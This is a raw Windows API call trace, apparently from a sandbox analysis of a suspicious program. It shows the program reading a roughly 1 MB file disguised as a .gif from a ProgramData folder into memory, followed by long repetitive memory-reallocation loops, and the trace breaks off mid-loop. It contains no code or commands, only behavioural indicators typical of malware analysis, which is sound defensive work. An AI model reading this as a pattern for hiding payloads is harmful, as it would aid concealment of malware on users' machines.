[0127.817] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0127.817] GetCurrentThreadId () returned 0x764
[0127.817] GlobalAddAtomA (lpString="WndProcPtr0040000000000764") returned 0xc12d
[0127.817] VirtualAlloc (lpAddress=0x584000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x584000
[0127.818] ShowWindow (hWnd=0x601e4, nCmdShow=0) returned 0
[0127.818] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0127.818] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0127.818] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x8f9f0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x8f9f0*=0) returned 0x0
[0127.818] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x8f9e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x8f9e8*=0) returned 0x0
[0127.818] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x8f9e8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x8f9e8*=0) returned 0x10be00
[0127.818] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x8f9e8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x8f9e8*=0) returned 0x0
[0127.819] GlobalLock (hMem=0x380004) returned 0x2270020
[0127.819] ReadFile (in: hFile=0x98, lpBuffer=0x2270020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x8fa04, lpOverlapped=0x0 | out: lpBuffer=0x2270020*, lpNumberOfBytesRead=0x8fa04*=0x10be00, lpOverlapped=0x0) returned 1
[0127.890] CloseHandle (hObject=0x98) returned 1
[0127.890] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.891] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.891] GlobalUnlock (hMem=0x38000c) returned 0
[0127.891] GlobalReAlloc (hMem=0x38000c, dwBytes=0x4000, uFlags=0x2) returned 0x38000c
[0127.891] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.891] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.891] GlobalUnlock (hMem=0x38000c) returned 0
[0127.891] GlobalReAlloc (hMem=0x38000c, dwBytes=0x6000, uFlags=0x2) returned 0x38000c
[0127.892] GlobalLock (hMem=0x38000c) returned 0xca820
[0127.892] GlobalHandle (pMem=0xca820) returned 0x38000c
[0127.892] GlobalUnlock (hMem=0x38000c) returned 0
[0127.892] GlobalReAlloc (hMem=0x38000c, dwBytes=0x8000, uFlags=0x2) returned 0x38000c
[0127.893] GlobalLock (hMem=0x38000c) returned 0xd0830
[0127.893] GlobalHandle (pMem=0xd0830) returned 0x38000c
[0127.893] GlobalUnlock (hMem=0x38000c) returned 0
[0127.893] GlobalReAlloc (hMem=0x38000c, dwBytes=0xa000, uFlags=0x2) returned 0x38000c
[0127.893] GlobalLock (hMem=0x38000c) returned 0xd0830
[0127.894] GlobalHandle (pMem=0xd0830) returned 0x38000c
[0127.894] GlobalUnlock (hMem=0x38000c) returned 0
[0127.894] GlobalReAlloc (hMem=0x38000c, dwBytes=0xc000, uFlags=0x2) returned 0x38000c
[0127.895] GlobalLock (hMem=0x38000c) returned 0xda840
[0127.895] GlobalHandle (pMem=0xda840) returned 0x38000c
[0127.895] GlobalUnlock (hMem=0x38000c) returned 0
[0127.895] GlobalReAlloc (hMem=0x38000c, dwBytes=0xe000, uFlags=0x2) returned 0x38000c
[0127.896] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.896] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.896] GlobalUnlock (hMem=0x38000c) returned 0
[0127.896] GlobalReAlloc (hMem=0x38000c, dwBytes=0x10000, uFlags=0x2) returned 0x38000c
[0127.896] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.897] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.897] GlobalUnlock (hMem=0x38000c) returned 0
[0127.897] GlobalReAlloc (hMem=0x38000c, dwBytes=0x12000, uFlags=0x2) returned 0x38000c
[0127.897] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.897] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.897] GlobalUnlock (hMem=0x38000c) returned 0
[0127.897] GlobalReAlloc (hMem=0x38000c, dwBytes=0x14000, uFlags=0x2) returned 0x38000c
[0127.897] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.898] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.898] GlobalUnlock (hMem=0x38000c) returned 0
[0127.898] GlobalReAlloc (hMem=0x38000c, dwBytes=0x16000, uFlags=0x2) returned 0x38000c
[0127.898] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.898] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.898] GlobalUnlock (hMem=0x38000c) returned 0
[0127.898] GlobalReAlloc (hMem=0x38000c, dwBytes=0x18000, uFlags=0x2) returned 0x38000c
[0127.898] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.899] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.899] GlobalUnlock (hMem=0x38000c) returned 0
[0127.899] GlobalReAlloc (hMem=0x38000c, dwBytes=0x1a000, uFlags=0x2) returned 0x38000c
[0127.899] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.899] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.899] GlobalUnlock (hMem=0x38000c) returned 0
[0127.899] GlobalReAlloc (hMem=0x38000c, dwBytes=0x1c000, uFlags=0x2) returned 0x38000c
[0127.899] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.900] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.900] GlobalUnlock (hMem=0x38000c) returned 0
[0127.900] GlobalReAlloc (hMem=0x38000c, dwBytes=0x1e000, uFlags=0x2) returned 0x38000c
[0127.900] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.900] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.900] GlobalUnlock (hMem=0x38000c) returned 0
[0127.900] GlobalReAlloc (hMem=0x38000c, dwBytes=0x20000, uFlags=0x2) returned 0x38000c
[0127.900] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.901] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.901] GlobalUnlock (hMem=0x38000c) returned 0
[0127.901] GlobalReAlloc (hMem=0x38000c, dwBytes=0x22000, uFlags=0x2) returned 0x38000c
[0127.903] GlobalLock (hMem=0x38000c) returned 0xe6820
[0127.903] GlobalHandle (pMem=0xe6820) returned 0x38000c
[0127.903] GlobalUnlock (hMem=0x38000c) returned 0
[0127.903] GlobalReAlloc (hMem=0x38000c, dwBytes=0x24000, uFlags=0x2) returned 0x38000c
[0127.903] GlobalLock (hMem=0x38000c) returned 0xe6820
[0127.904] GlobalHandle (pMem=0xe6820) returned 0x38000c
[0127.904] GlobalUnlock (hMem=0x38000c) returned 0
[0127.904] GlobalReAlloc (hMem=0x38000c, dwBytes=0x26000, uFlags=0x2) returned 0x38000c
[0127.906] GlobalLock (hMem=0x38000c) returned 0x10a830
[0127.906] GlobalHandle (pMem=0x10a830) returned 0x38000c
[0127.906] GlobalUnlock (hMem=0x38000c) returned 0
[0127.906] GlobalReAlloc (hMem=0x38000c, dwBytes=0x28000, uFlags=0x2) returned 0x38000c
[0127.906] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.907] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.907] GlobalUnlock (hMem=0x38000c) returned 0
[0127.907] GlobalReAlloc (hMem=0x38000c, dwBytes=0x2a000, uFlags=0x2) returned 0x38000c
[0127.907] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.907] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.907] GlobalUnlock (hMem=0x38000c) returned 0
[0127.907] GlobalReAlloc (hMem=0x38000c, dwBytes=0x2c000, uFlags=0x2) returned 0x38000c
[0127.907] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.908] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.908] GlobalUnlock (hMem=0x38000c) returned 0
[0127.908] GlobalReAlloc (hMem=0x38000c, dwBytes=0x2e000, uFlags=0x2) returned 0x38000c
[0127.908] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.908] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.908] GlobalUnlock (hMem=0x38000c) returned 0
[0127.908] GlobalReAlloc (hMem=0x38000c, dwBytes=0x30000, uFlags=0x2) returned 0x38000c
[0127.908] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.909] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.909] GlobalUnlock (hMem=0x38000c) returned 0
[0127.909] GlobalReAlloc (hMem=0x38000c, dwBytes=0x32000, uFlags=0x2) returned 0x38000c
[0127.909] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.909] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.909] GlobalUnlock (hMem=0x38000c) returned 0
[0127.909] GlobalReAlloc (hMem=0x38000c, dwBytes=0x34000, uFlags=0x2) returned 0x38000c
[0127.909] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.910] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.910] GlobalUnlock (hMem=0x38000c) returned 0
[0127.910] GlobalReAlloc (hMem=0x38000c, dwBytes=0x36000, uFlags=0x2) returned 0x38000c
[0127.910] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.910] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.910] GlobalUnlock (hMem=0x38000c) returned 0
[0127.910] GlobalReAlloc (hMem=0x38000c, dwBytes=0x38000, uFlags=0x2) returned 0x38000c
[0127.910] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.911] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.911] GlobalUnlock (hMem=0x38000c) returned 0
[0127.911] GlobalReAlloc (hMem=0x38000c, dwBytes=0x3a000, uFlags=0x2) returned 0x38000c
[0127.911] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.911] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.911] GlobalUnlock (hMem=0x38000c) returned 0
[0127.911] GlobalReAlloc (hMem=0x38000c, dwBytes=0x3c000, uFlags=0x2) returned 0x38000c
[0127.911] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.911] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.912] GlobalUnlock (hMem=0x38000c) returned 0
[0127.912] GlobalReAlloc (hMem=0x38000c, dwBytes=0x3e000, uFlags=0x2) returned 0x38000c
[0127.912] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.912] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.912] GlobalUnlock (hMem=0x38000c) returned 0
[0127.912] GlobalReAlloc (hMem=0x38000c, dwBytes=0x40000, uFlags=0x2) returned 0x38000c
[0127.912] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.912] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.912] GlobalUnlock (hMem=0x38000c) returned 0
[0127.913] GlobalReAlloc (hMem=0x38000c, dwBytes=0x42000, uFlags=0x2) returned 0x38000c
[0127.913] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.913] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.913] GlobalUnlock (hMem=0x38000c) returned 0
[0127.913] GlobalReAlloc (hMem=0x38000c, dwBytes=0x44000, uFlags=0x2) returned 0x38000c
[0127.913] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.914] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.914] GlobalUnlock (hMem=0x38000c) returned 0
[0127.914] GlobalReAlloc (hMem=0x38000c, dwBytes=0x46000, uFlags=0x2) returned 0x38000c
[0127.914] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.914] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.914] GlobalUnlock (hMem=0x38000c) returned 0
[0127.914] GlobalReAlloc (hMem=0x38000c, dwBytes=0x48000, uFlags=0x2) returned 0x38000c
[0127.914] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.915] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.915] GlobalUnlock (hMem=0x38000c) returned 0
[0127.915] GlobalReAlloc (hMem=0x38000c, dwBytes=0x4a000, uFlags=0x2) returned 0x38000c
[0127.915] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.915] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.915] GlobalUnlock (hMem=0x38000c) returned 0
[0127.915] GlobalReAlloc (hMem=0x38000c, dwBytes=0x4c000, uFlags=0x2) returned 0x38000c
[0127.915] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.916] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.916] GlobalUnlock (hMem=0x38000c) returned 0
[0127.916] GlobalReAlloc (hMem=0x38000c, dwBytes=0x4e000, uFlags=0x2) returned 0x38000c
[0127.916] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.916] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.916] GlobalUnlock (hMem=0x38000c) returned 0
[0127.916] GlobalReAlloc (hMem=0x38000c, dwBytes=0x50000, uFlags=0x2) returned 0x38000c
[0127.916] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.917] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.917] GlobalUnlock (hMem=0x38000c) returned 0
[0127.917] GlobalReAlloc (hMem=0x38000c, dwBytes=0x52000, uFlags=0x2) returned 0x38000c
[0127.917] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.917] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.917] GlobalUnlock (hMem=0x38000c) returned 0
[0127.917] GlobalReAlloc (hMem=0x38000c, dwBytes=0x54000, uFlags=0x2) returned 0x38000c
[0127.917] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.918] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.918] GlobalUnlock (hMem=0x38000c) returned 0
[0127.918] GlobalReAlloc (hMem=0x38000c, dwBytes=0x56000, uFlags=0x2) returned 0x38000c
[0127.918] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.918] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.918] GlobalUnlock (hMem=0x38000c) returned 0
[0127.918] GlobalReAlloc (hMem=0x38000c, dwBytes=0x58000, uFlags=0x2) returned 0x38000c
[0127.918] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.919] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.919] GlobalUnlock (hMem=0x38000c) returned 0
[0127.919] GlobalReAlloc (hMem=0x38000c, dwBytes=0x5a000, uFlags=0x2) returned 0x38000c
[0127.919] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.919] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.919] GlobalUnlock (hMem=0x38000c) returned 0
[0127.919] GlobalReAlloc (hMem=0x38000c, dwBytes=0x5c000, uFlags=0x2) returned 0x38000c
[0127.919] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.920] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.920] GlobalUnlock (hMem=0x38000c) returned 0
[0127.920] GlobalReAlloc (hMem=0x38000c, dwBytes=0x5e000, uFlags=0x2) returned 0x38000c
[0127.920] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.920] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.920] GlobalUnlock (hMem=0x38000c) returned 0
[0127.920] GlobalReAlloc (hMem=0x38000c, dwBytes=0x60000, uFlags=0x2) returned 0x38000c
[0127.920] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.921] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.921] GlobalUnlock (hMem=0x38000c) returned 0
[0127.921] GlobalReAlloc (hMem=0x38000c, dwBytes=0x62000, uFlags=0x2) returned 0x38000c
[0127.921] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.921] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.921] GlobalUnlock (hMem=0x38000c) returned 0
[0127.921] GlobalReAlloc (hMem=0x38000c, dwBytes=0x64000, uFlags=0x2) returned 0x38000c
[0127.921] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.922] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.922] GlobalUnlock (hMem=0x38000c) returned 0
[0127.922] GlobalReAlloc (hMem=0x38000c, dwBytes=0x66000, uFlags=0x2) returned 0x38000c
[0127.922] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.922] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.922] GlobalUnlock (hMem=0x38000c) returned 0
[0127.922] GlobalReAlloc (hMem=0x38000c, dwBytes=0x68000, uFlags=0x2) returned 0x38000c
[0127.922] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.923] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.923] GlobalUnlock (hMem=0x38000c) returned 0
[0127.923] GlobalReAlloc (hMem=0x38000c, dwBytes=0x6a000, uFlags=0x2) returned 0x38000c
[0127.923] GlobalLock (hMem=0x38000c) returned 0xc6810
[0127.923] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0127.923] GlobalUnlock (hMem=0x38000c) returned 0
[0127.923] GlobalReAlloc (hMem=0x38000c, dwBytes=0x6c000, uFlags=0x2) returned 0x38000c
[0127.928] GlobalLock (hMem=0x38000c) returned 0x130820
[0127.976] GlobalHandle (pMem=0x130820) returned 0x38000c
[0127.976] GlobalUnlock (hMem=0x38000c) returned 0
[0127.976] GlobalReAlloc (hMem=0x38000c, dwBytes=0x6e000, uFlags=0x2) returned 0x38000c
[0127.976] GlobalLock (hMem=0x38000c) returned 0x130820
[0127.977] GlobalHandle (pMem=0x130820) returned 0x38000c
[0127.977] GlobalUnlock (hMem=0x38000c) returned 0
[0127.977] GlobalReAlloc (hMem=0x38000c, dwBytes=0x70000, uFlags=0x2) returned 0x38000c
[0127.991] GlobalLock (hMem=0x38000c) returned 0x2380048
[0128.000] GlobalHandle (pMem=0x2380048) returned 0x38000c
[0128.000] GlobalUnlock (hMem=0x38000c) returned 0
[0128.000] GlobalReAlloc (hMem=0x38000c, dwBytes=0x72000, uFlags=0x2) returned 0x38000c
[0128.006] GlobalLock (hMem=0x38000c) returned 0x23f0058
[0128.007] GlobalHandle (pMem=0x23f0058) returned 0x38000c
[0128.007] GlobalUnlock (hMem=0x38000c) returned 0
[0128.007] GlobalReAlloc (hMem=0x38000c, dwBytes=0x74000, uFlags=0x2) returned 0x38000c
[0128.007] GlobalLock (hMem=0x38000c) returned 0x23f0058
[0128.008] GlobalHandle (pMem=0x23f0058) returned 0x38000c
[0128.008] GlobalUnlock (hMem=0x38000c) returned 0
[0128.008] GlobalReAlloc (hMem=0x38000c, dwBytes=0x76000, uFlags=0x2) returned 0x38000c
[0128.021] GlobalLock (hMem=0x38000c) returned 0xc6810
[0128.022] GlobalHandle (pMem=0xc6810) returned 0x38000c
[0128.022] GlobalUnlock (hMem=0x38000c) returned 0
[0128.022] GlobalReAlloc (hMem=0x38000c, dwBytes=0x78000, uFlags=0x2) returned 0x38000c
[0128.075] GlobalLock (hMem=0x38000c) returned 0x2380048
[0128.076] GlobalHandle (pMem=0x2380048) returned 0x38000c
[0128.076] GlobalUnlock (hMem=0x38000c) returned 0
[0128.076] GlobalReAlloc (hMem=0x38000c, dwBytes=0x7a000, uFlags=0x2) returned 0x38000c
[0128.083] GlobalLock (hMem=0x38000c) returned 0x23f8058
[0128.084] GlobalHandle (pMem=0x23f8058) returned 0x38000c
[0128.084] GlobalUnlock (hMem=0x38000c) returned 0
[0128.084] GlobalReAlloc (hMem=0x38000c, dwBytes=0x7c000, uFlags=0x2) returned 0x38000c
[0128.084] GlobalLock (hMem=0x38000c) returned 0x23f8058
[0128.086] GlobalHandle (pMem=0x23f8058) returned 0x38000c
[0128.086] GlobalUnlock (hMem=0x38000c) returned 0
[0128.086] GlobalReAlloc (hMem=0x38000c, dwBytes=0x7e000, uFlags=0x2) returned 0x38000c
[0128.104] GlobalLock (hMem=0x38000c) returned 0x2480048
[0128.105] GlobalHandle (pMem=0x2480048) returned 0x38000c
[0128.105] GlobalUnlock (hMem=0x38000c) returned 0
[0128.105] GlobalReAlloc (hMem=0x38000c, dwBytes=0x80000, uFlags=0x2) returned 0x38000c
[0128.169] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.170] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.170] GlobalUnlock (hMem=0x38000c) returned 0
[0128.170] GlobalReAlloc (hMem=0x38000c, dwBytes=0x82000, uFlags=0x2) returned 0x38000c
[0128.182] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.183] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.183] GlobalUnlock (hMem=0x38000c) returned 0
[0128.183] GlobalReAlloc (hMem=0x38000c, dwBytes=0x84000, uFlags=0x2) returned 0x38000c
[0128.194] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.195] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.195] GlobalUnlock (hMem=0x38000c) returned 0
[0128.195] GlobalReAlloc (hMem=0x38000c, dwBytes=0x86000, uFlags=0x2) returned 0x38000c
[0128.206] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.207] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.207] GlobalUnlock (hMem=0x38000c) returned 0
[0128.207] GlobalReAlloc (hMem=0x38000c, dwBytes=0x88000, uFlags=0x2) returned 0x38000c
[0128.265] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.266] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.266] GlobalUnlock (hMem=0x38000c) returned 0
[0128.266] GlobalReAlloc (hMem=0x38000c, dwBytes=0x8a000, uFlags=0x2) returned 0x38000c
[0128.278] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.279] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.279] GlobalUnlock (hMem=0x38000c) returned 0
[0128.279] GlobalReAlloc (hMem=0x38000c, dwBytes=0x8c000, uFlags=0x2) returned 0x38000c
[0128.291] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.292] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.292] GlobalUnlock (hMem=0x38000c) returned 0
[0128.292] GlobalReAlloc (hMem=0x38000c, dwBytes=0x8e000, uFlags=0x2) returned 0x38000c
[0128.353] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.354] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.354] GlobalUnlock (hMem=0x38000c) returned 0
[0128.354] GlobalReAlloc (hMem=0x38000c, dwBytes=0x90000, uFlags=0x2) returned 0x38000c
[0128.366] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.367] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.367] GlobalUnlock (hMem=0x38000c) returned 0
[0128.367] GlobalReAlloc (hMem=0x38000c, dwBytes=0x92000, uFlags=0x2) returned 0x38000c
[0128.379] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.380] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.380] GlobalUnlock (hMem=0x38000c) returned 0
[0128.380] GlobalReAlloc (hMem=0x38000c, dwBytes=0x94000, uFlags=0x2) returned 0x38000c
[0128.392] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.393] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.393] GlobalUnlock (hMem=0x38000c) returned 0
[0128.393] GlobalReAlloc (hMem=0x38000c, dwBytes=0x96000, uFlags=0x2) returned 0x38000c
[0128.452] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.453] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.453] GlobalUnlock (hMem=0x38000c) returned 0
[0128.453] GlobalReAlloc (hMem=0x38000c, dwBytes=0x98000, uFlags=0x2) returned 0x38000c
[0128.465] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.466] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.466] GlobalUnlock (hMem=0x38000c) returned 0
[0128.466] GlobalReAlloc (hMem=0x38000c, dwBytes=0x9a000, uFlags=0x2) returned 0x38000c
[0128.478] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.479] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.479] GlobalUnlock (hMem=0x38000c) returned 0
[0128.479] GlobalReAlloc (hMem=0x38000c, dwBytes=0x9c000, uFlags=0x2) returned 0x38000c
[0128.540] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.540] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.540] GlobalUnlock (hMem=0x38000c) returned 0
[0128.541] GlobalReAlloc (hMem=0x38000c, dwBytes=0x9e000, uFlags=0x2) returned 0x38000c
[0128.553] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.554] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.554] GlobalUnlock (hMem=0x38000c) returned 0
[0128.554] GlobalReAlloc (hMem=0x38000c, dwBytes=0xa0000, uFlags=0x2) returned 0x38000c
[0128.567] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.575] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.575] GlobalUnlock (hMem=0x38000c) returned 0
[0128.575] GlobalReAlloc (hMem=0x38000c, dwBytes=0xa2000, uFlags=0x2) returned 0x38000c
[0128.635] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.636] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.636] GlobalUnlock (hMem=0x38000c) returned 0
[0128.636] GlobalReAlloc (hMem=0x38000c, dwBytes=0xa4000, uFlags=0x2) returned 0x38000c
[0128.650] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.651] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.651] GlobalUnlock (hMem=0x38000c) returned 0
[0128.651] GlobalReAlloc (hMem=0x38000c, dwBytes=0xa6000, uFlags=0x2) returned 0x38000c
[0128.664] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.665] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.665] GlobalUnlock (hMem=0x38000c) returned 0
[0128.665] GlobalReAlloc (hMem=0x38000c, dwBytes=0xa8000, uFlags=0x2) returned 0x38000c
[0128.727] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.728] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.728] GlobalUnlock (hMem=0x38000c) returned 0
[0128.728] GlobalReAlloc (hMem=0x38000c, dwBytes=0xaa000, uFlags=0x2) returned 0x38000c
[0128.742] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.743] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.743] GlobalUnlock (hMem=0x38000c) returned 0
[0128.743] GlobalReAlloc (hMem=0x38000c, dwBytes=0xac000, uFlags=0x2) returned 0x38000c
[0128.758] GlobalLock (hMem=0x38000c) returned 0x13c0020
[0128.759] GlobalHandle (pMem=0x13c0020) returned 0x38000c
[0128.759] GlobalUnlock (hMem=0x38000c) returned 0
[0128.759] GlobalReAlloc (hMem=0x38000c, dwBytes=0xae000, uFlags=0x2) returned 0x38000c
[0128.821] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.822] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.822] GlobalUnlock (hMem=0x38000c) returned 0
[0128.822] GlobalReAlloc (hMem=0x38000c, dwBytes=0xb0000, uFlags=0x2) returned 0x38000c
[0128.836] GlobalLock (hMem=0x38000c) returned 0x2730020
[0128.837] GlobalHandle (pMem=0x2730020) returned 0x38000c
[0128.837] GlobalUnlock (hMem=0x38000c) returned 0
[0128.837] GlobalReAlloc (hMem=0x38000c, dwBytes=0xb2000, uFlags=0x2) returned 0x38000c
[0128.851] GlobalLock (hMem=0x38000c) returned 0x27f0020
[0128.852] GlobalHandle (pMem=0x27f0020) returned 0x38000c
[0128.852] GlobalUnlock (hMem=0x38000c) returned 0
[0128.852] GlobalReAlloc (hMem=0x38000c, dwBytes=0xb4000, uFlags=0x2) returned 0x38000c
[0128.929] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.930] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.930] GlobalUnlock (hMem=0x38000c) returned 0
[0128.930] GlobalReAlloc (hMem=0x38000c, dwBytes=0xb6000, uFlags=0x2) returned 0x38000c
[0128.946] GlobalLock (hMem=0x38000c) returned 0x2740020
[0128.947] GlobalHandle (pMem=0x2740020) returned 0x38000c
[0128.947] GlobalUnlock (hMem=0x38000c) returned 0
[0128.947] GlobalReAlloc (hMem=0x38000c, dwBytes=0xb8000, uFlags=0x2) returned 0x38000c
[0128.962] GlobalLock (hMem=0x38000c) returned 0x2680020
[0128.962] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0128.962] GlobalUnlock (hMem=0x38000c) returned 0
[0128.963] GlobalReAlloc (hMem=0x38000c, dwBytes=0xba000, uFlags=0x2) returned 0x38000c
[0129.024] GlobalLock (hMem=0x38000c) returned 0x2740020
